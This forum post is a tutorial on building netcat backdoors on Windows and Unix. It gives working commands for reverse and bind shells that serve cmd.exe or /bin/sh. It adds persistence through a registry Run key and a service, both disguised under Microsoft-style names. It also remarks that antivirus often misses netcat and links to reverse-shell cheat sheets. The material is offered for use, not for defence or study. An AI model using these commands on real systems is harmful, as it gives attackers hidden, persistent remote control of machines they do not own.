My apologies for not being active for so long, but I should be here for at least a little bit now...
So to get started, backdoors with netcat.
If you do not already know what netcat is, I am referring to hobbits netcat which you can find here:
http://joncraton.org/media/files/nc111nt.zipFirefox told it was possibly malicious, which it is. I'm telling you how to create a back door, your system will go crazy. If you believe its a virus then so be it, you can stop reading now.
Netcat is referred to as a network swiss army tool. Its a fairly simple application that produces tunnels or connections to different computers.
You can view the entire help file with nc.exe -h, but for now the two important commands:
nc.exe -l -p port creates a listener on a port.
nc.exe ipoflistener portoflister connects to listener.
Thats great and all, but what really makes netcat useful as a back door is the -e command, which executes a program or script after successful connection. So for example:
nc.exe ipoflistener portoflister -e cmdgives you a windows shell upon connect. That is the basic principle of the back door with netcat, get a computer to host a netcat server on a specific port, and then connect to that port and you get a shell. A different version of the backdoor is where the listener has the -e command, and all you have to do is connect and are automatically dropped into shell. Not to much of a difference, but could be helpful in certain situations. Only problem with this single command is as soon as you connect and log off, no more listener waiting, so lets fix that.
nc.exe -d -L -p 12345 -e cmd.exeSpawns initial listening server on port 12345, that will keep listening if client disconnects (-L) and runs without a shell (-d)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d “c:\nc.exe -d -L -p 12345 -e cmd.exe”adds to startup
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d -L -p 12345 -e cmd.exe" start=auto error=ignoreadds netcat command as a windows service
The above two commands I borrowed from the site:
http://blog.pusheax.com/2012/04/power-of-netcat.htmlSo I can not guarantee if they work or not, I have yet to test it.
Now everything above was for a windows machine, using cmd, its essentially the same for a unix system, just use /bin/sh instead of cmd.exe,
more on that here: http://shebangme.blogspot.com/2011/07/netcat-cheat-sheet.htmlNetcat is my favorite tool, makes everything much easier, very simple, and really isn't that hard to mask behind AV at all. A scan on it from virus total showed that only 24/47 showed it as an alert on a scan of the straight up, non-encrypted nc.exe. This means that some AV's dont consider it a virus, so yay for us.
Another useful link is the netcat cheat sheet, which shows some more uses and how to do them : http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdfThats that. I know netcat is older and there are better tools out there, but its still a fundamental tool and can be used in a lot of different scenarios. Thanks for reading, and hope you learned something or at least enjoyed the info.
-Fear
EDIT: Random size tags appeared, fixed now
EDIT2: I forgot to mention, reverse shells are a wonderful thing. For more, in several different languages:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
